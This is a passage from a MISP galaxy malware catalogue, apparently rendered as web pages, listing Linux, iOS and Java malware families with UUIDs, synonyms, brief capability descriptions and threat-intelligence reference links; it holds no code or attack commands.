UUID be3a5211-45a8-496a-974f-6ef14f44af3d which can be used as unique global reference for WHIRLPOOL in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.whirlpool - webarchive
- https://www.cisa.gov/news-events/analysis-reports/ar23-250a-0 - webarchive
- https://www.cisa.gov/sites/default/files/2023-08/MAR-10459736.r1.v1.CLEAR_.pdf - webarchive
- https://www.cisa.gov/sites/default/files/2023-08/MAR-10454006.r4.v2.CLEAR_.pdf - webarchive
- https://sansorg.egnyte.com/dd/8ekLJCPHPj/ - webarchive
- https://cloud.google.com/blog/topics/threat-intelligence/barracuda-esg-exploited-globally/ - webarchive
- https://www.youtube.com/watch?v=4zaStuUdvrE - webarchive
- https://services.google.com/fh/files/misc/01-chinese-espionage-article-m-trends-2024.pdf - webarchive
- https://www.cisa.gov/sites/default/files/2023-09/MAR-10454006.r5.v1.CLEAR__0.pdf - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
WhiteRabbit
Internal MISP references
UUID 901b88e6-4759-4aa6-b4d1-9f7da53c2adf which can be used as unique global reference for WhiteRabbit in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.whiterabbit - webarchive
- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/Ransom.Win32.WHITERABBIT.YACAET - webarchive
- https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Winnti (ELF)
Internal MISP references
UUID d6c5211e-506d-415c-b886-0ced529399a1 which can be used as unique global reference for Winnti (ELF) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.winnti - webarchive
- https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought - webarchive
- https://attack.mitre.org/groups/G0096 - webarchive
- https://asec.ahnlab.com/en/55785/ - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2023-0808.pdf - webarchive
- https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a - webarchive
- https://blog.exatrack.com/melofee/ - webarchive
- https://blog.xlab.qianxin.com/glutton_stealthily_targets_mainstream_php_frameworks-en/ - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-atlas - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Wirenet (ELF)
Internal MISP references
UUID 47a8fedb-fd60-493a-9b7d-082bdb85621e which can be used as unique global reference for Wirenet (ELF) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
WolfsBane
Internal MISP references
UUID 88af7974-f89a-438b-8cd2-059a9136069c which can be used as unique global reference for WolfsBane in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
X-Agent (ELF)
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular X-Agent (ELF).
| Known Synonyms |
|---|
| chopstick |
| fysbis |
| splm |
Internal MISP references
UUID a8404a31-968a-47e8-8434-533ceaf84c1f which can be used as unique global reference for X-Agent (ELF) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.xagent - webarchive
- https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/ - webarchive
- http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/ - webarchive
- https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/ - webarchive
- https://securelist.com/a-slice-of-2017-sofacy-activity/83930/ - webarchive
- https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender_In-depth_analysis_of_APT28%E2%80%93The_Political_Cyber-Espionage.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/iron-twilight - webarchive
- https://unit42.paloaltonetworks.com/a-look-into-fysbis-sofacys-linux-backdoor/ - webarchive
- http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf - webarchive
- https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Xanthe
Internal MISP references
UUID 55b4d75f-adcc-47df-81cf-6c93ccb54a56 which can be used as unique global reference for Xanthe in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.xanthe - webarchive
- https://blog.talosintelligence.com/2020/12/xanthe-docker-aware-miner.html - webarchive
- https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775 - webarchive
- https://www.cadosecurity.com/abcbot-an-evolution-of-xanthe/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Xaynnalc
Internal MISP references
UUID 32b95dc7-03a6-45ab-a991-466208dd92d2 which can be used as unique global reference for Xaynnalc in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Xbash
Internal MISP references
UUID ee54fc1e-c574-4836-8cdb-992ac38cef32 which can be used as unique global reference for Xbash in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
xdr33
According to 360 netlab, this backdoor was derived from the leaked CIA Hive project. It propagates via a vulnerability in F5 and communicates using SSL with a forged Kaspersky certificate.
Internal MISP references
UUID c7b1cc91-7464-436e-ac40-3b06c98400a5 which can be used as unique global reference for xdr33 in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
xmrig
According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".
In most cases, "bundling" is used to infiltrate several potentially unwanted applications (PUAs) at once. So there is a high probability that the XMRIG virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
Internal MISP references
UUID 88efd461-03dd-42eb-976c-5e9fe403fce6 which can be used as unique global reference for xmrig in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig - webarchive
- https://gridinsoft.com/xmrig - webarchive
- https://www.akamai.com/blog/security-research/2024-php-exploit-cve-one-day-after-disclosure - webarchive
- https://harfanglab.io/insidethelab/unpacking-packxor/ - webarchive
- https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
XOR DDoS
Linux DDoS C&C Malware
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular XOR DDoS.
| Known Synonyms |
|---|
| XORDDOS |
Internal MISP references
UUID 7f9df618-4bd1-44a1-ad88-e5930373aac4 which can be used as unique global reference for XOR DDoS in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.xorddos - webarchive
- http://blog.malwaremustdie.org/2014/09/mmd-0028-2014-fuzzy-reversing-new-china.html - webarchive
- https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf - webarchive
- https://www.crowdstrike.com/blog/linux-targeted-malware-increased-by-35-percent-in-2021/ - webarchive
- https://www.lacework.com/groundhog-botnet-rapidly-infecting-cloud/ - webarchive
- https://bartblaze.blogspot.com/2015/09/notes-on-linuxxorddos.html - webarchive
- https://www.botconf.eu/wp-content/uploads/2015/12/OK-P13-Liu-Ya-Automatically-Classify-Unknown-Bots-by-The-Register-Messages.pdf - webarchive
- https://www.microsoft.com/security/blog/2022/05/19/rise-in-xorddos-a-deeper-look-at-the-stealthy-ddos-malware-targeting-linux-devices/ - webarchive
- https://blog.checkpoint.com/wp-content/uploads/2015/10/sb-report-threat-intelligence-groundhog.pdf - webarchive
- https://blog.talosintelligence.com/unmasking-the-new-xorddos-controller-and-infrastructure/ - webarchive
- https://en.wikipedia.org/wiki/Xor_DDoS - webarchive
- https://maxkersten.nl/binary-analysis-course/analysis-scripts/ghidra-script-to-decrypt-a-string-array-in-xor-ddos/ - webarchive
- https://www.intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/ - webarchive
- https://blog.avast.com/2015/01/06/linux-ddos-trojan-hiding-itself-with-an-embedded-rootkit/ - webarchive
- https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775 - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers/ - webarchive
- https://www.virusbulletin.com/uploads/pdf/conference/vb2015/KalnaiHorejsi-VB2015.pdf - webarchive
- https://blog.nsfocusglobal.com/threats/vulnerability-analysis/analysis-report-of-the-xorddos-malware-family/ - webarchive
- https://www.fireeye.com/blog/threat-research/2015/02/anatomy_of_a_brutef.html - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Zergeca
Zergeca is a DDoS botnet and backdoor written in Golang. It uses a modified UPX for packing, with the magic number 0x30219101 instead of "UPX!". It is distributed via weak Telnet passwords and known vulnerabilities.
Internal MISP references
UUID a660eeda-910a-4df5-86ba-f17d8ac93c31 which can be used as unique global reference for Zergeca in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
ZeroBot
ZeroBot is a Go-based botnet that spreads primarily through IoT and web application vulnerabilities. It is offered as malware as a service (MaaS) and infrastructure overlaps with DDoS-for-hire services seized by the FBI in December 2022.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ZeroBot.
| Known Synonyms |
|---|
| ZeroStresser |
Internal MISP references
UUID 458c583b-4353-4104-bee8-9e68cb77f151 which can be used as unique global reference for ZeroBot in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
ZHtrap
Internal MISP references
UUID d070ff73-ad14-4f6b-951f-1645009bdf80 which can be used as unique global reference for ZHtrap in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Zollard
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Zollard.
| Known Synonyms |
|---|
| darlloz |
Internal MISP references
UUID 9218630d-0425-4b18-802c-447a9322990d which can be used as unique global reference for Zollard in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
ZuoRAT
According to Black Lotus Labs, ZuoRAT is a MIPS file compiled for SOHO routers that can enumerate a host and internal LAN, capture packets being transmitted over the infected device and perform person-in-the-middle attacks (DNS and HTTPS hijacking based on predefined rules).
Internal MISP references
UUID c4b0a7cd-b349-44a1-94ca-3d5a4ac288b2 which can be used as unique global reference for ZuoRAT in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
AutoCAD Downloader
Small downloader composed as a Fast-AutoLoad LISP (FAS) module for AutoCAD.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular AutoCAD Downloader.
| Known Synonyms |
|---|
| Acad.Bursted |
| Duxfas |
Internal MISP references
UUID fb22d876-c6b5-4634-a468-5857088d605c which can be used as unique global reference for AutoCAD Downloader in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
COOKIESNATCH
According to Google, this is a cookie stealer.
Internal MISP references
UUID 1b2d02d7-aa83-4101-ab10-2767b59c9c75 which can be used as unique global reference for COOKIESNATCH in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
DualToy (iOS)
Internal MISP references
UUID f7c1675f-b38a-4511-9ac4-6e475b3815e6 which can be used as unique global reference for DualToy (iOS) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
GuiInject
Internal MISP references
UUID d9215579-eee0-4e50-9157-dba7c3214769 which can be used as unique global reference for GuiInject in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
lightSpy
Internal MISP references
UUID 8a1b524b-8fc9-4b1d-805d-c0407aff00d7 which can be used as unique global reference for lightSpy in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ios.lightspy - webarchive
- https://www.threatfabric.com/blogs/lightspy-mapt-mobile-payment-system-attack - webarchive
- https://documents.trendmicro.com/assets/Tech-Brief-Operation-Poisoned-News-Hong-Kong-Users-Targeted-with-Mobile-Malware-via-Local-News-Links.pdf - webarchive
- https://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/ - webarchive
- https://hunt.io/blog/lightspy-malware-targets-facebook-instagram - webarchive
- https://securelist.com/ios-exploit-chain-deploys-lightspy-malware/96407/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/operation-poisoned-news-hong-kong-users-targeted-with-mobile-malware-via-local-news-links/ - webarchive
- https://hunt.io/blog/tracking-lightspy-certificates-as-windows-into-adversary-behavior - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Phenakite
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Phenakite.
| Known Synonyms |
|---|
| Dakkatoni |
Internal MISP references
UUID 7ba7488c-b153-4949-8391-bcf6c4b057bd which can be used as unique global reference for Phenakite in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
PoisonCarp
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PoisonCarp.
| Known Synonyms |
|---|
| INSOMNIA |
Internal MISP references
UUID 7982cc15-f884-40ca-8a82-a452b9c340c7 which can be used as unique global reference for PoisonCarp in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ios.poisoncarp - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/new-android-spyware-actionspy-revealed-via-phishing-attacks-from-earth-empusa/ - webarchive
- https://citizenlab.ca/2019/09/poison-carp-tibetan-groups-targeted-with-1-click-mobile-exploits/ - webarchive
- https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Postlo
Internal MISP references
UUID 25bff9ad-20dc-4746-a174-e54fcdd8f0c1 which can be used as unique global reference for Postlo in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
TriangleDB
Internal MISP references
UUID 25754894-018b-4bed-aab6-c676fac23a77 which can be used as unique global reference for TriangleDB in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ios.triangledb - webarchive
- https://securelist.com/operation-triangulation-the-last-hardware-mystery/111669/ - webarchive
- https://securelist.com/triangledb-triangulation-implant/110050/ - webarchive
- https://securelist.com/triangulation-validators-modules/110847/ - webarchive
- https://securelist.com/operation-triangulation-catching-wild-triangle/110916/ - webarchive
- https://media.ccc.de/v/37c3-11859-operation_triangulation_what_you_get_when_attack_iphones_of_researchers - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
VALIDVICTOR
According to Google, this reconnaissance payload uses a profiling framework drawing canvas to identify the target’s exact iPhone model, a technique used by many other actors. The iPhone model is sent back to the C2 along with screen size, whether or not a touch screen is present, and a unique identifier per initial GET request (e.g., 1lwuzddaxoom5ylli37v90kj). The server replies with either an AES encrypted next stage or 0, indicating that no payload is available for this device. The payload makes another request to the exploit server with gcr=1 as a parameter to get the AES decryption key from the C2.
Internal MISP references
UUID 16c0e484-7d03-46f4-870a-297d5397d693 which can be used as unique global reference for VALIDVICTOR in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
WireLurker (iOS)
The iOS malware that is installed over USB by osx.wirelurker.
Internal MISP references
UUID bb340271-023c-4283-9d22-123317824a11 which can be used as unique global reference for WireLurker (iOS) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
X-Agent (iOS)
Internal MISP references
UUID 430b9f30-5e37-49c8-b4e7-21589f120d89 which can be used as unique global reference for X-Agent (iOS) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
AdWind
Part of a Malware-as-a-Service platform. Used as a generic name for Java-based RATs.
Functionality:
- collect general system and user information
- terminate processes
- log keystrokes
- take screenshots and access the webcam
- steal cached passwords from local or web forms
- download and execute malware
- modify the registry
- download components
- Denial of Service attacks
- acquire VPN certificates
Initial infection vector:
1. Email with JAR files attached
2. Malspam URL to download the malware
Persistence: Run key - HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Hiding: uses attrib.exe
Notes on Adwind: the malware is not known to be proxy aware.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular AdWind.
| Known Synonyms |
|---|
| AlienSpy |
| Frutas |
| JBifrost |
| JSocket |
| Sockrat |
| UNRECOM |
Internal MISP references
UUID 8eb9d4aa-257a-45eb-8c65-95c18500171c which can be used as unique global reference for AdWind in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/jar.adwind - webarchive
- https://marcoramilli.com/2018/08/20/interesting-hidden-threat-since-years/ - webarchive
- https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/ - webarchive
- https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf - webarchive
- https://research.checkpoint.com/malware-against-the-c-monoculture/ - webarchive
- https://gist.github.com/herrcore/8336975475e88f9bc539d94000412885 - webarchive
- https://www.fortinet.com/blog/threat-research/new-jrat-adwind-variant-being-spread-with-package-delivery-scam.html - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf - webarchive
- https://dissectingmalware.blogspot.com/2018/08/export-jratadwind-config-with-x32dbg.html - webarchive
- https://www.zscaler.com/blogs/research/compromised-wordpress-sites-used-distribute-adwind-rat - webarchive
- http://malware-traffic-analysis.net/2017/07/04/index.html - webarchive
- https://blogs.seqrite.com/evolution-of-jrat-java-malware/ - webarchive
- https://citizenlab.ca/2015/12/packrat-report/ - webarchive
- https://blog.talosintelligence.com/2018/09/adwind-dodgesav-dde.html - webarchive
- http://blog.trendmicro.com/trendlabs-security-intelligence/spam-remote-access-trojan-adwind-jrat - webarchive
- https://www.securityinbits.com/malware-analysis/interesting-tactic-by-ratty-adwind-distribution-of-jar-appended-to-signed-msi/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Adzok
Internal MISP references
UUID 90cb8ee6-52e6-4d8d-8f45-f04b9aec1f6c which can be used as unique global reference for Adzok in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Akemi
According to VMRay, this malware family uses an interesting obfuscation technique: a trailing slash in its archive to confuse analysis tools. It abuses GitHub as a C2 and exfiltrates stolen data, such as browser cookies, via Discord webhooks. The GitHub repositories are quite active and have existed since mid to late 2024. The malware also monitors keyboard and mouse input and takes screenshots.
Internal MISP references
UUID 89cb5bac-d6eb-4e3e-9fb4-ca001d138224 which can be used as unique global reference for Akemi in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Banload
F-Secure observed Banload variants silently downloading malicious files from a remote server, then installing and executing the files.
Internal MISP references
UUID 30a61fa9-4bd1-427d-9382-ff7c33bd7043 which can be used as unique global reference for Banload in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/jar.banload - webarchive
- https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf - webarchive
- https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=TrojanDownloader%3AWin32%2FBanload - webarchive
- https://colin.guru/index.php?title=Advanced_Banload_Analysis - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2015/05/CPL-Malware-in-Brasil-zx02m.pdf - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Blue Banana RAT
Internal MISP references
UUID c51bbc9b-0906-4ac5-8026-d6b8b7b23e71 which can be used as unique global reference for Blue Banana RAT in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
CrossRAT
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CrossRAT.
| Known Synonyms |
|---|
| Trupto |
Internal MISP references
UUID bae3a6c7-9e58-47f2-8749-a194675e1c84 which can be used as unique global reference for CrossRAT in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
DynamicRAT
DynamicRAT is a malware that is spread via email attachments and compromises the security of computer systems. Once running on a device, DynamicRAT establishes a persistent presence and gives attackers complete remote control. Its features include sensitive data exfiltration, hardware control, remote action, and the ability to perform DDoS attacks. In addition, DynamicRAT uses evasion and persistence techniques to evade detection and analysis by security solutions.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DynamicRAT.
| Known Synonyms |
|---|
| DYNARAT |
Internal MISP references
UUID 28539c3d-89a4-4dd6-85f5-f4c95808c0b7 which can be used as unique global reference for DynamicRAT in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
EpicSplit RAT
EpicSplit RAT is a multiplatform Java RAT that is capable of running shell commands, downloading, uploading, and executing files, manipulating the file system, establishing persistence, taking screenshots, and manipulating keyboard and mouse events. EpicSplit is typically obfuscated with the commercial Allatori Obfuscator software. One unique feature of the malware is that TCP messages sent by EpicSplit RAT to its C2 are terminated with the string "packet" as a packet delimiter.
Internal MISP references
UUID 90b304a2-452a-4c74-ae8d-80d9ace881a4 which can be used as unique global reference for EpicSplit RAT in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
FEimea RAT
Internal MISP references
UUID 3724d5d0-860d-4d1e-92a1-0a7089ca2bb3 which can be used as unique global reference for FEimea RAT in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
IceRat
According to Karsten Hahn, this malware is actually written in JPHP, but can be treated similarly to .class files produced by Java. IceRat has been observed to carry out information stealing and mining.
Internal MISP references
UUID ac83a481-2ab4-42c2-a8b6-a4aec96e1c4b which can be used as unique global reference for IceRat in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
JavaDispCash
JavaDispCash is a piece of malware designed for ATMs. The compromise happens by using the JVM attach API on the ATM's local application, with the goal of remotely controlling its operation. The malware's primary feature is the ability to dispense cash. The malware also opens a local port (65413) listening for commands from the attacker, who needs to be located in the same internal network.
Internal MISP references
UUID 71286008-9794-4dcc-a571-164195390c39 which can be used as unique global reference for JavaDispCash in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
JavaLocker
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular JavaLocker.
| Known Synonyms |
|---|
| JavaEncrypt Ransomware |
Internal MISP references
UUID 4bdddf41-8d5e-468d-905d-8c6667a5d47f which can be used as unique global reference for JavaLocker in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
jRAT
jRAT, also known as Jacksbot, is a RAT with a long history, written in Java. It has support for macOS, Linux, Windows and various BSDs. It also has functionality to participate in DDoS attacks as well as to perform click fraud. Note that the Adwind family is often mistakenly labeled as jRAT because of a red-herring reference to jrat.io.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular jRAT.
| Known Synonyms |
|---|
| Jacksbot |
Internal MISP references
UUID f2a9f583-b4dd-4669-8808-49c8bbacc376 which can be used as unique global reference for jRAT in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/jar.jrat - webarchive
- https://www.eff.org/files/2018/01/29/operation-manul.pdf - webarchive
- https://maskop9.wordpress.com/2019/02/06/analysis-of-jacksbot-backdoor/ - webarchive
- https://research.checkpoint.com/malware-against-the-c-monoculture/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/jacksbot-has-some-dirty-tricks-up-its-sleeves/ - webarchive
- https://www.intego.com/mac-security-blog/new-multiplatform-backdoor-jacksbot-discovered - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
jSpy
Internal MISP references
UUID ff24997d-1f17-4f00-b9b8-b3392146540f which can be used as unique global reference for jSpy in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Mineping
DDoS for Minecraft servers.
Internal MISP references
UUID f3f38528-a8bf-496a-af46-7eb60a9ec6c3 which can be used as unique global reference for Mineping in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Octopus Scanner
Internal MISP references
UUID 8ae996fe-50bb-479b-925c-e6b1e51a9b40 which can be used as unique global reference for Octopus Scanner in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Pronsis Loader
According to TrustWave, this is a loader leveraging JPHP, which was observed fetching Latrodectus and Lumma.
Internal MISP references
UUID 80005653-bfbb-4a37-a8bf-87f8dc9e4047 which can be used as unique global reference for Pronsis Loader in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/jar.pronsis_loader - webarchive
- https://cloud.google.com/blog/topics/threat-intelligence/russian-espionage-influence-ukrainian-military-recruits-anti-mobilization-narratives?hl=en - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pronsis-loader-a-jphp-driven-malware-diverging-from-d3fck-loader/ - webarchive
- https://cloud.google.com/blog/topics/threat-intelligence/russian-espionage-influence-ukrainian-military-recruits-anti-mobilization-narratives - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Qarallax RAT
According to SpiderLabs, in May 2015 the "company" Quaverse offered a RAT known as Quaverse RAT or QRAT. At around May 2016, this QRAT evolved into another RAT which became known as Qarallax RAT, because its C2 is at qarallax.com. Quaverse also offers a service to encrypt Java payloads (Qrypter), and thus qrypted payloads are sometimes confused with Quaverse RATs (QRAT / Qarallax RAT).
Internal MISP references
UUID e7852eb9-9de9-43d3-9f7e-3821f3b2bf41 which can be used as unique global reference for Qarallax RAT in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Qealler
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Qealler.
| Known Synonyms |
|---|
| Pyrogenic Infostealer |
Internal MISP references
UUID d16a3a1f-e244-4715-a67f-61ba30901efb which can be used as unique global reference for Qealler in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/jar.qealler - webarchive
- https://www.herbiez.com/?p=1352 - webarchive
- https://www.cyberark.com/threat-research-blog/qealler-the-silent-java-credential-thief/ - webarchive
- https://www.securityinbits.com/malware-analysis/unpacking/unpacking-pyrogenic-qealler-using-java-agent-part-0x2/ - webarchive
- https://github.com/jeFF0Falltrades/Malware-Writeups/blob/master/Qealler/Qealler-Unloaded.pdf - webarchive
- https://www.securityinbits.com/malware-analysis/pyrogenic-infostealer-static-analysis-part-0x1/ - webarchive
- https://www.zscaler.com/blogs/research/qealler-new-jar-based-information-stealer - webarchive
- https://www.securityinbits.com/malware-analysis/similarity-between-qealler-pyrogenic-variants-part-0x3/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
QRat
QRat, also known as Quaverse RAT, was introduced in May 2015 as undetectable (because of multiple layers of obfuscation). It offers the usual functionality (password dumper, file browser, keylogger, screen shots/streaming, ...), and it comes as a SaaS. For additional historical context, please see jar.qarallax.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular QRat.
| Known Synonyms |
|---|
| Quaverse RAT |
Internal MISP references
UUID ef385825-bfa1-4e8c-b368-522db78cf1bd which can be used as unique global reference for QRat in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/jar.qrat - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/updated-qnode-rat-downloader-distributed-as-trump-video-scandal/ - webarchive
- https://www.digitrustgroup.com/java-rat-qrat/ - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/rats-and-spam-the-nodejs-qrat/ - webarchive
- https://www.trustwave.com/Resources/SpiderLabs-Blog/Quaverse-RAT--Remote-Access-as-a-Service/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Ratty
Ratty is an open source Java RAT, made available on GitHub and promoted heavily on HackForums. At some point in 2016 / 2017 the original author deleted his repository, but several clones exist.
Internal MISP references
UUID da032a95-b02a-4af2-b563-69f686653af4 which can be used as unique global reference for Ratty in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/jar.ratty - webarchive
- https://www.fortinet.com/blog/threat-research/multilayered-email-attack-how-a-pdf-invoice-and-geofencing-led-to-rat-malware - webarchive
- https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/ - webarchive
- https://www.securityinbits.com/malware-analysis/interesting-tactic-by-ratty-adwind-distribution-of-jar-appended-to-signed-msi/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
